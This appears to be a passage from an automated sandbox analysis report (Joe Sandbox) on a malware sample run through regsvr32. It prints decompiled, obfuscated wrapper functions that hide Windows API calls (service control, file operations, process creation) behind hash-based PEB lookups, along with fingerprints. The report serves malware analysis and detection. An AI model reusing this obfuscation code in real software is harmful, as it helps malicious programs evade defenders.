5024->4143 5026 4800ae 5025->5026 5027 48eaa3 2 API calls 5026->5027 5028 48040e 5026->5028 5029 487394 GetPEB 5026->5029 5027->5026 5028->4143 5029->5026 5031 47f61e 5030->5031 5032 48bff0 GetPEB 5031->5032 5033 47f6be 5032->5033 5033->4143 5035 48bff0 GetPEB 5034->5035 5036 47e370 5035->5036 5036->4143 5038 47f9bd 5037->5038 5039 48bff0 GetPEB 5038->5039 5040 47fa61 5039->5040 5040->4139 5042 485c1b 5041->5042 5043 48bff0 GetPEB 5042->5043 5044 485ca5 5043->5044 5044->4148 5046 47e0fe 5045->5046 5047 48bff0 GetPEB 5046->5047 5048 47e19d 5047->5048 5048->4148 5052 47d8af 5049->5052 5051 47da67 5073 47ff02 5051->5073 5052->5051 5054 47b184 GetPEB 5052->5054 5055 47da65 5052->5055 5069 481c3c 5052->5069 5054->5052 5055->4166 5064 479425 5056->5064 5057 474bb4 2 API calls 5057->5064 5058 473f09 GetPEB 5058->5064 5059 47954c 5060 473152 GetPEB 5059->5060 5062 47954a 5060->5062 5061 47b9d7 GetPEB 5061->5064 5062->4166 5064->5057 5064->5058 5064->5059 5064->5061 5064->5062 5077 48462a 5064->5077 5066 47f6e5 5065->5066 5067 48bff0 GetPEB 5066->5067 5068 47f778 5067->5068 5068->4171 5070 481c5e 5069->5070 5071 48bff0 GetPEB 5070->5071 5072 481d0f 5071->5072 5072->5052 5074 47ff24 5073->5074 5075 48bff0 GetPEB 5074->5075 5076 47ffca 5075->5076 5076->5055 5078 484649 5077->5078 5079 48bff0 GetPEB 5078->5079 5080 4846d3 5079->5080 5080->5064

                                                                                                                Executed Functions

                                                                                                                Function 0047F1D5 Relevance: 1.6, APIs: 1, Instructions: 69COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 58%
                                                                                                                			E0047F1D5(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				unsigned int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t49;
				intOrPtr* _t58;
				void* _t59;
				signed int _t62;
				void* _t67;
				void* _t68;

				_t68 = __edx;
				_t67 = __ecx;
				E00479E7D(_t49);
				_v36 = 0xea873e;
				_v32 = 0xb2392b;
				_v28 = 0;
				_v24 = 0;
				_v12 = 0xdc192d;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 >> 0xf;
				_v12 = _v12 + 0x11b5;
				_v12 = _v12 ^ 0x0007f5c7;
				_v20 = 0x6dcef4;
				_t62 = 0x6b;
				_v20 = _v20 * 0x54;
				_v20 = _v20 << 0x10;
				_v20 = _v20 ^ 0xe81a0a50;
				_v16 = 0x9ccfab;
				_v16 = _v16 | 0xc76ed5d6;
				_v16 = _v16 >> 0xf;
				_v16 = _v16 ^ 0x000c5bda;
				_v8 = 0xcca784;
				_v8 = _v8 / _t62;
				_v8 = _v8 >> 0xf;
				_v8 = _v8 ^ 0x01549e3f;
				_v8 = _v8 ^ 0x01571d5c;
				_t58 = E0048BFF0(0xac802c42, 0x317, _t62, _t62, 0x42a4b2ae);
				_t59 =  *_t58(_t67, 0, _t68, 0x28, __ecx, __edx, _a4, _a8, 0, _a16, _a20, 0x28); // executed
				return _t59;
			}

















                                                                                                                0x0047f1e5
                                                                                                                0x0047f1ea
                                                                                                                0x0047f1f5
                                                                                                                0x0047f1fa
                                                                                                                0x0047f203
                                                                                                                0x0047f20a
                                                                                                                0x0047f20d
                                                                                                                0x0047f210
                                                                                                                0x0047f217
                                                                                                                0x0047f21b
                                                                                                                0x0047f21f
                                                                                                                0x0047f226
                                                                                                                0x0047f22d
                                                                                                                0x0047f23a
                                                                                                                0x0047f23e
                                                                                                                0x0047f241
                                                                                                                0x0047f245
                                                                                                                0x0047f24c
                                                                                                                0x0047f253
                                                                                                                0x0047f25a
                                                                                                                0x0047f25e
                                                                                                                0x0047f265
                                                                                                                0x0047f276
                                                                                                                0x0047f279
                                                                                                                0x0047f27d
                                                                                                                0x0047f284
                                                                                                                0x0047f2a3
                                                                                                                0x0047f2b0
                                                                                                                0x0047f2b8

                                                                                                                APIs
                                                                                                                • SetFileInformationByHandle.KERNEL32(00000000,00000000,?,00000028,?,?,?,?,?,?,?,?,00000028,00000000,0000002C,00000000), ref: 0047F2B0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.483924206.0000000000471000.00000020.00000800.00020000.00000000.sdmp, Offset: 00470000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.483918446.0000000000470000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.483968059.0000000000494000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_470000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FileHandleInformation
                                                                                                                • String ID:
                                                                                                                • API String ID: 3935143524-0
                                                                                                                • Opcode ID: 77f1dd4d0ad90e3cc37e42a6920fbdcf951fc3ee27da9feae082ec12eeed1182
                                                                                                                • Instruction ID: e644b52bfb087a88701387e09f6569e07726accb1c88d736d1bf81bc468dbd3d
                                                                                                                • Opcode Fuzzy Hash: 77f1dd4d0ad90e3cc37e42a6920fbdcf951fc3ee27da9feae082ec12eeed1182
                                                                                                                • Instruction Fuzzy Hash: 962177B5D0020DAFDB08DFA5C88A8EEFBB4FB44708F10809DE515AA240C7B45B54DFA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004732B5 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 498 4732b5-47338a call 479e7d call 48bff0 OpenSCManagerW
                                                                                                                C-Code - Quality: 83%
                                                                                                                			E004732B5(void* __ecx, void* __edx, int _a4, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				short* _v24;
				short* _v28;
				intOrPtr _v32;
				void* _t49;
				void* _t62;
				signed int _t64;
				signed int _t65;

				_push(0);
				_push(_a12);
				_push(0);
				_push(_a4);
				E00479E7D(_t49);
				_v32 = 0xf329ca;
				_v28 = 0;
				_v24 = 0;
				_v16 = 0x2373b;
				_t64 = 0x7a;
				_v16 = _v16 * 0x75;
				_t65 = 0x3d;
				_v16 = _v16 / _t64;
				_v16 = _v16 ^ 0x00061266;
				_v12 = 0xb7be71;
				_v12 = _v12 >> 0xb;
				_v12 = _v12 + 0xafdb;
				_v12 = _v12 ^ 0x7920a4e8;
				_v12 = _v12 ^ 0x79205c77;
				_v8 = 0x1abc5;
				_v8 = _v8 / _t65;
				_v8 = _v8 << 0xb;
				_v8 = _v8 ^ 0x07f89b39;
				_v8 = _v8 ^ 0x07caeaee;
				_v20 = 0x49b926;
				_v20 = _v20 * 0x47;
				_v20 = _v20 ^ 0x147483b3;
				E0048BFF0(0x11de522c, 0x30d, _t65, _t65, 0xea9607);
				_t62 = OpenSCManagerW(0, 0, _a4); // executed
				return _t62;
			}














                                                                                                                0x004732be
                                                                                                                0x004732bf
                                                                                                                0x004732c2
                                                                                                                0x004732c3
                                                                                                                0x004732c8
                                                                                                                0x004732cd
                                                                                                                0x004732d6
                                                                                                                0x004732d9
                                                                                                                0x004732dc
                                                                                                                0x004732e9
                                                                                                                0x004732ec
                                                                                                                0x004732f4
                                                                                                                0x004732f5
                                                                                                                0x004732fa
                                                                                                                0x00473304
                                                                                                                0x0047330b
                                                                                                                0x0047330f
                                                                                                                0x00473316
                                                                                                                0x0047331d
                                                                                                                0x00473324
                                                                                                                0x00473335
                                                                                                                0x00473338
                                                                                                                0x0047333c
                                                                                                                0x00473343
                                                                                                                0x0047334a
                                                                                                                0x00473361
                                                                                                                0x00473364
                                                                                                                0x00473377
                                                                                                                0x00473384
                                                                                                                0x0047338a

                                                                                                                APIs
                                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,79205C77,?,?,?,?,?,?,?,?,00000000), ref: 00473384
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.483924206.0000000000471000.00000020.00000800.00020000.00000000.sdmp, Offset: 00470000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.483918446.0000000000470000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.483968059.0000000000494000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_470000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ManagerOpen
                                                                                                                • String ID: w\ y
                                                                                                                • API String ID: 1889721586-240614871
                                                                                                                • Opcode ID: 1f5861dd61b294354832cf9b9edfb87b87b26e314b348a251be8c10d0985441e
                                                                                                                • Instruction ID: c07d2e44635da6ce81b43373f85e3fdf19324b0ab3b6fe3ffe4beb3d661cdc2c
                                                                                                                • Opcode Fuzzy Hash: 1f5861dd61b294354832cf9b9edfb87b87b26e314b348a251be8c10d0985441e
                                                                                                                • Instruction Fuzzy Hash: 5A2112B5D01228FBCB04DFAAD84A9EEBFB5EB40304F20818AE524A6250D3B55B40DF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0047C4EB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54serviceCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 503 47c4eb-47c5c2 call 479e7d call 48bff0 OpenServiceW
                                                                                                                C-Code - Quality: 76%
                                                                                                                			E0047C4EB(void* __ecx, int __edx, short* _a4, void* _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t46;
				void* _t54;
				int _t58;

				_push(_a16);
				_t58 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00479E7D(_t46);
				_v24 = _v24 & 0x00000000;
				_v36 = 0xd40f1;
				_v32 = 0xcb52a0;
				_v28 = 0x146fa1;
				_v20 = 0xb8dab7;
				_v20 = _v20 >> 1;
				_v20 = _v20 << 5;
				_v20 = _v20 ^ 0x0b80f677;
				_v8 = 0x87dd92;
				_v8 = _v8 + 0xffffe9d3;
				_v8 = _v8 * 0x55;
				_v8 = _v8 << 0xa;
				_v8 = _v8 ^ 0x54d92ec5;
				_v16 = 0xb88fea;
				_v16 = _v16 | 0xf85cd4fd;
				_v16 = _v16 + 0xed22;
				_v16 = _v16 ^ 0xf8f0d6dc;
				_v12 = 0x2c3d87;
				_v12 = _v12 + 0x3690;
				_v12 = _v12 + 0xfffff048;
				_v12 = _v12 ^ 0x0029d00c;
				E0048BFF0(0x11de522c, 0xe1, __ecx, __ecx, 0x5fb2da2f);
				_t54 = OpenServiceW(_a8, _a4, _t58); // executed
				return _t54;
			}














                                                                                                                0x0047c4f2
                                                                                                                0x0047c4f5
                                                                                                                0x0047c4f7
                                                                                                                0x0047c4fa
                                                                                                                0x0047c4fd
                                                                                                                0x0047c500
                                                                                                                0x0047c501
                                                                                                                0x0047c502
                                                                                                                0x0047c507
                                                                                                                0x0047c50e
                                                                                                                0x0047c515
                                                                                                                0x0047c51c
                                                                                                                0x0047c523
                                                                                                                0x0047c52a
                                                                                                                0x0047c52d
                                                                                                                0x0047c531
                                                                                                                0x0047c538
                                                                                                                0x0047c53f
                                                                                                                0x0047c556
                                                                                                                0x0047c55e
                                                                                                                0x0047c562
                                                                                                                0x0047c569
                                                                                                                0x0047c570
                                                                                                                0x0047c577
                                                                                                                0x0047c57e
                                                                                                                0x0047c585
                                                                                                                0x0047c58c
                                                                                                                0x0047c593
                                                                                                                0x0047c59a
                                                                                                                0x0047c5ad
                                                                                                                0x0047c5bc
                                                                                                                0x0047c5c2

                                                                                                                APIs
                                                                                                                • OpenServiceW.ADVAPI32(F8F0D6DC,0029D00C,?,?,?,?,?,?,?,?,?,?), ref: 0047C5BC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.483924206.0000000000471000.00000020.00000800.00020000.00000000.sdmp, Offset: 00470000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.483918446.0000000000470000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.483968059.0000000000494000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_470000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: OpenService
                                                                                                                • String ID: "
                                                                                                                • API String ID: 3098006287-1598837362
                                                                                                                • Opcode ID: a522d33089ec895b54db4c824c20dd1e836209a16b7f06b25475ede4dc9ef992
                                                                                                                • Instruction ID: f340523a7c46149766d1f57092d0282b3e1a3f0b6a46834ef0bb16cc25f87ad4
                                                                                                                • Opcode Fuzzy Hash: a522d33089ec895b54db4c824c20dd1e836209a16b7f06b25475ede4dc9ef992
                                                                                                                • Instruction Fuzzy Hash: 00211FB5C00209ABCF15DFA5D8499EEBBB4EF14318F108588EA25A6260E3B55B14DF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0048A98E Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54serviceCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 508 48a98e-48aa51 call 479e7d call 48bff0 CloseServiceHandle
                                                                                                                C-Code - Quality: 90%
                                                                                                                			E0048A98E(void* __ecx, void* __edx, void* _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t45;
				int _t58;
				signed int _t60;
				signed int _t61;

				_push(_a8);
				_push(_a4);
				E00479E7D(_t45);
				_v24 = _v24 & 0x00000000;
				_v28 = 0xdfb18c;
				_v12 = 0xac05d3;
				_v12 = _v12 + 0xffffe692;
				_t60 = 6;
				_v12 = _v12 * 0xa;
				_v12 = _v12 ^ 0x06b0bc77;
				_v20 = 0xcbcea5;
				_t61 = 0x73;
				_v20 = _v20 / _t60;
				_v20 = _v20 ^ 0x0026c0c8;
				_v16 = 0x706a69;
				_v16 = _v16 + 0xffff322e;
				_v16 = _v16 ^ 0x006745ff;
				_v8 = 0xc7f3e7;
				_v8 = _v8 * 0x7b;
				_v8 = _v8 + 0xffffee1e;
				_v8 = _v8 / _t61;
				_v8 = _v8 ^ 0x00d4d133;
				E0048BFF0(0x11de522c, 0x223, _t61, _t61, 0x2fdf0f26);
				_t58 = CloseServiceHandle(_a4); // executed
				return _t58;
			}













                                                                                                                0x0048a994
                                                                                                                0x0048a997
                                                                                                                0x0048a99c
                                                                                                                0x0048a9a1
                                                                                                                0x0048a9a7
                                                                                                                0x0048a9ae
                                                                                                                0x0048a9b5
                                                                                                                0x0048a9c2
                                                                                                                0x0048a9c5
                                                                                                                0x0048a9c8
                                                                                                                0x0048a9cf
                                                                                                                0x0048a9db
                                                                                                                0x0048a9dc
                                                                                                                0x0048a9e1
                                                                                                                0x0048a9eb
                                                                                                                0x0048a9f2
                                                                                                                0x0048a9f9
                                                                                                                0x0048aa00
                                                                                                                0x0048aa17
                                                                                                                0x0048aa1a
                                                                                                                0x0048aa2b
                                                                                                                0x0048aa2e
                                                                                                                0x0048aa41
                                                                                                                0x0048aa4c
                                                                                                                0x0048aa51

                                                                                                                APIs
                                                                                                                • CloseServiceHandle.ADVAPI32(06B0BC77,?,?,?,?,?,?,?,?), ref: 0048AA4C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.483924206.0000000000471000.00000020.00000800.00020000.00000000.sdmp, Offset: 00470000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.483918446.0000000000470000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.483968059.0000000000494000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_470000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandleService
                                                                                                                • String ID: ijp
                                                                                                                • API String ID: 1725840886-2001787820
                                                                                                                • Opcode ID: 1ca84afc33d7b938950ae22bf4e2629023950455804043fd17485c6cfe7ce1c4
                                                                                                                • Instruction ID: 2abb536a8cdfd02320a917172c3a87bfdae446d42f2e8264f9e780096d312ae1
                                                                                                                • Opcode Fuzzy Hash: 1ca84afc33d7b938950ae22bf4e2629023950455804043fd17485c6cfe7ce1c4
                                                                                                                • Instruction Fuzzy Hash: BE2117B5D0520DFBEF04DFA5D98A9AEBBB5EB40304F10C19AE404AB260D7B49B449F84
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0047338B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 52COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 513 47338b-473454 call 479e7d call 48bff0 SHFileOperationW
                                                                                                                C-Code - Quality: 95%
                                                                                                                			E0047338B(void* __ecx, void* __edx, struct _SHFILEOPSTRUCTW* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				void* _t46;
				int _t58;
				signed int _t60;

				_push(_a4);
				E00479E7D(_t46);
				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v32 = 0x221b15;
				_v20 = 0x156690;
				_t60 = 5;
				_v20 = _v20 * 0x69;
				_v20 = _v20 ^ 0x08c90ac4;
				_v12 = 0x1a8107;
				_v12 = _v12 / _t60;
				_v12 = _v12 | 0x5e0d12b3;
				_v12 = _v12 * 0x36;
				_v12 = _v12 ^ 0xd6d73012;
				_v8 = 0x305b7c;
				_v8 = _v8 + 0xffffaa6a;
				_v8 = _v8 << 0xf;
				_v8 = _v8 | 0xeac0b19d;
				_v8 = _v8 ^ 0xeaf3a664;
				_v16 = 0x5b8d10;
				_v16 = _v16 * 0x69;
				_v16 = _v16 + 0x95d4;
				_v16 = _v16 ^ 0x258da45e;
				E0048BFF0(0xee7aaf55, 0x302, _t60, _t60, 0x2f7a8b42);
				_t58 = SHFileOperationW(_a4); // executed
				return _t58;
			}













                                                                                                                0x00473391
                                                                                                                0x00473396
                                                                                                                0x0047339b
                                                                                                                0x004733a1
                                                                                                                0x004733a5
                                                                                                                0x004733ac
                                                                                                                0x004733b9
                                                                                                                0x004733bd
                                                                                                                0x004733c0
                                                                                                                0x004733c7
                                                                                                                0x004733d8
                                                                                                                0x004733db
                                                                                                                0x004733f2
                                                                                                                0x004733f5
                                                                                                                0x004733fc
                                                                                                                0x00473403
                                                                                                                0x0047340a
                                                                                                                0x0047340e
                                                                                                                0x00473415
                                                                                                                0x0047341c
                                                                                                                0x00473427
                                                                                                                0x0047342a
                                                                                                                0x00473431
                                                                                                                0x00473444
                                                                                                                0x0047344f
                                                                                                                0x00473454

                                                                                                                APIs
                                                                                                                • SHFileOperationW.SHELL32(D6D73012,?,?,?,?,?,?,?), ref: 0047344F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.483924206.0000000000471000.00000020.00000800.00020000.00000000.sdmp, Offset: 00470000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.483918446.0000000000470000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.483968059.0000000000494000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_470000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FileOperation
                                                                                                                • String ID: |[0
                                                                                                                • API String ID: 3080627654-3711761429
                                                                                                                • Opcode ID: 192e83401a02290710fada622201ed24515585c6a043cd12288e9317895715c1
                                                                                                                • Instruction ID: d8b6afae6e6ac4d1f10185526c7305954a6811ad415fafffb0548f62f7acc900
                                                                                                                • Opcode Fuzzy Hash: 192e83401a02290710fada622201ed24515585c6a043cd12288e9317895715c1
                                                                                                                • Instruction Fuzzy Hash: F12106B4D01209EFDF04DFA5C94AAEEBBB4FF10315F10858DE424AA291D7B96B548F90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0048E373 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 51COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 85%
                                                                                                                			E0048E373(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t41;
				int _t51;
				signed int _t53;
				void* _t58;

				_push(_a8);
				_t58 = __edx;
				_push(_a4);
				_push(__edx);
				E00479E7D(_t41);
				_v20 = 0xc362e1;
				_v20 = _v20 + 0xffff2419;
				_v20 = _v20 + 0xffff15b9;
				_v20 = _v20 ^ 0x00c90db5;
				_v16 = 0x370fa8;
				_v16 = _v16 + 0x3ddc;
				_v16 = _v16 + 0xfffffca4;
				_v16 = _v16 ^ 0x003af0ce;
				_v8 = 0x58cda3;
				_t53 = 0x37;
				_v8 = _v8 / _t53;
				_v8 = _v8 | 0xee3498e5;
				_v8 = _v8 + 0xffff3fab;
				_v8 = _v8 ^ 0xee3595ac;
				_v12 = 0xe7384d;
				_v12 = _v12 + 0x2a59;
				_v12 = _v12 * 0x31;
				_v12 = _v12 ^ 0x2c4bf561;
				E0048BFF0(0xac802c42, 0x278, _t53, _t53, 0x298e9f43);
				_t51 = CloseHandle(_t58); // executed
				return _t51;
			}











                                                                                                                0x0048e37a
                                                                                                                0x0048e37d
                                                                                                                0x0048e37f
                                                                                                                0x0048e382
                                                                                                                0x0048e384
                                                                                                                0x0048e389
                                                                                                                0x0048e392
                                                                                                                0x0048e399
                                                                                                                0x0048e3a0
                                                                                                                0x0048e3a7
                                                                                                                0x0048e3ae
                                                                                                                0x0048e3b5
                                                                                                                0x0048e3bc
                                                                                                                0x0048e3c3
                                                                                                                0x0048e3cf
                                                                                                                0x0048e3d5
                                                                                                                0x0048e3d8
                                                                                                                0x0048e3df
                                                                                                                0x0048e3e6
                                                                                                                0x0048e3ed
                                                                                                                0x0048e3f4
                                                                                                                0x0048e40b
                                                                                                                0x0048e413
                                                                                                                0x0048e426
                                                                                                                0x0048e42f
                                                                                                                0x0048e435

                                                                                                                APIs
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00483F2A,00000000), ref: 0048E42F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.483924206.0000000000471000.00000020.00000800.00020000.00000000.sdmp, Offset: 00470000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.483918446.0000000000470000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.483968059.0000000000494000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_470000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandle
                                                                                                                • String ID: M8
                                                                                                                • API String ID: 2962429428-669864304
                                                                                                                • Opcode ID: 68676e9891b26dd68fe09ea734f654e49ab76dccc486115711d770e020b531c2
                                                                                                                • Instruction ID: df8dc33bf722dda5e050a392258a99e9571bc929f705472397b2d82fc823e6f5
                                                                                                                • Opcode Fuzzy Hash: 68676e9891b26dd68fe09ea734f654e49ab76dccc486115711d770e020b531c2
                                                                                                                • Instruction Fuzzy Hash: A71129B5D00209EFDF58DFA4C9498DEBBB4EB40324F108299E824B62A1D7B55B059F91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004846E0 Relevance: 1.6, APIs: 1, Instructions: 76processCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 43%
                                                                                                                			E004846E0(void* __ecx, struct _PROCESS_INFORMATION* __edx, long _a8, intOrPtr _a12, struct _STARTUPINFOW* _a16, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, WCHAR* _a40, intOrPtr _a44, int _a48, intOrPtr _a56, intOrPtr _a60, WCHAR* _a64, intOrPtr _a68) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t55;
				int _t64;
				signed int _t66;
				struct _PROCESS_INFORMATION* _t72;

				_push(_a68);
				_t72 = __edx;
				_push(_a64);
				_push(_a60);
				_push(_a56);
				_push(0);
				_push(_a48);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(__edx);
				E00479E7D(_t55);
				_v8 = 0x728488;
				_v8 = _v8 + 0x86b5;
				_v8 = _v8 << 0xb;
				_v8 = _v8 + 0xe7c2;
				_v8 = _v8 ^ 0x98526b3c;
				_v16 = 0xdd86ac;
				_v16 = _v16 | 0x9093749e;
				_v16 = _v16 + 0x773d;
				_v16 = _v16 ^ 0x90e3102d;
				_v20 = 0xa04379;
				_v20 = _v20 + 0xe8c2;
				_v20 = _v20 ^ 0x00a70f96;
				_v12 = 0x20815c;
				_t66 = 0x4c;
				_v12 = _v12 / _t66;
				_v12 = _v12 | 0xbbf973da;
				_v12 = _v12 ^ 0xbbf5b48f;
				E0048BFF0(0xac802c42, 0x58, _t66, _t66, 0xb43c22a7);
				_t64 = CreateProcessW(_a64, _a40, 0, 0, _a48, _a8, 0, 0, _a16, _t72); // executed
				return _t64;
			}











                                                                                                                0x004846e8
                                                                                                                0x004846ed
                                                                                                                0x004846ef
                                                                                                                0x004846f2
                                                                                                                0x004846f5
                                                                                                                0x004846f8
                                                                                                                0x004846f9
                                                                                                                0x004846fc
                                                                                                                0x004846ff
                                                                                                                0x00484702
                                                                                                                0x00484703
                                                                                                                0x00484706
                                                                                                                0x00484709
                                                                                                                0x0048470c
                                                                                                                0x0048470d
                                                                                                                0x00484710
                                                                                                                0x00484713
                                                                                                                0x00484716
                                                                                                                0x00484717
                                                                                                                0x00484719
                                                                                                                0x0048471e
                                                                                                                0x00484727
                                                                                                                0x0048472e
                                                                                                                0x00484732
                                                                                                                0x00484739
                                                                                                                0x00484740
                                                                                                                0x00484747
                                                                                                                0x0048474e
                                                                                                                0x00484755
                                                                                                                0x0048475c
                                                                                                                0x00484763
                                                                                                                0x0048476a
                                                                                                                0x00484771
                                                                                                                0x0048477d
                                                                                                                0x00484783
                                                                                                                0x00484786
                                                                                                                0x0048478d
                                                                                                                0x004847ae
                                                                                                                0x004847ca
                                                                                                                0x004847d1

                                                                                                                APIs
                                                                                                                • CreateProcessW.KERNEL32(?,?,00000000,00000000,?,90E3102D,00000000,00000000,00000000), ref: 004847CA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.483924206.0000000000471000.00000020.00000800.00020000.00000000.sdmp, Offset: 00470000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.483918446.0000000000470000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.483968059.0000000000494000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_470000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 963392458-0
                                                                                                                • Opcode ID: e0c050ce58c662d84963154c999a7e43a34ddb0fe429297838269ca99bc78211
                                                                                                                • Instruction ID: 3e6d2b9ad4257f4161572df614002ca6a985e8045c1d39061bb698ca8d611e61
                                                                                                                • Opcode Fuzzy Hash: e0c050ce58c662d84963154c999a7e43a34ddb0fe429297838269ca99bc78211
                                                                                                                • Instruction Fuzzy Hash: 2B31E372900248BBDF559F96CD09CDEBF75FB89314F008148FA2462160D7769A60DB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0048BF1C Relevance: 1.6, APIs: 1, Instructions: 63fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 55%
                                                                                                                			E0048BF1C(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, WCHAR* _a20, long _a24, long _a36, intOrPtr _a40) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t47;
				void* _t55;
				long _t60;

				_push(_a40);
				_t60 = __edx;
				_push(_a36);
				_push(0);
				_push(0);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00479E7D(_t47);
				_v20 = 0x8eb723;
				_v20 = _v20 + 0xdb15;
				_v20 = _v20 ^ 0x00852a30;
				_v16 = 0x113147;
				_v16 = _v16 >> 0xc;
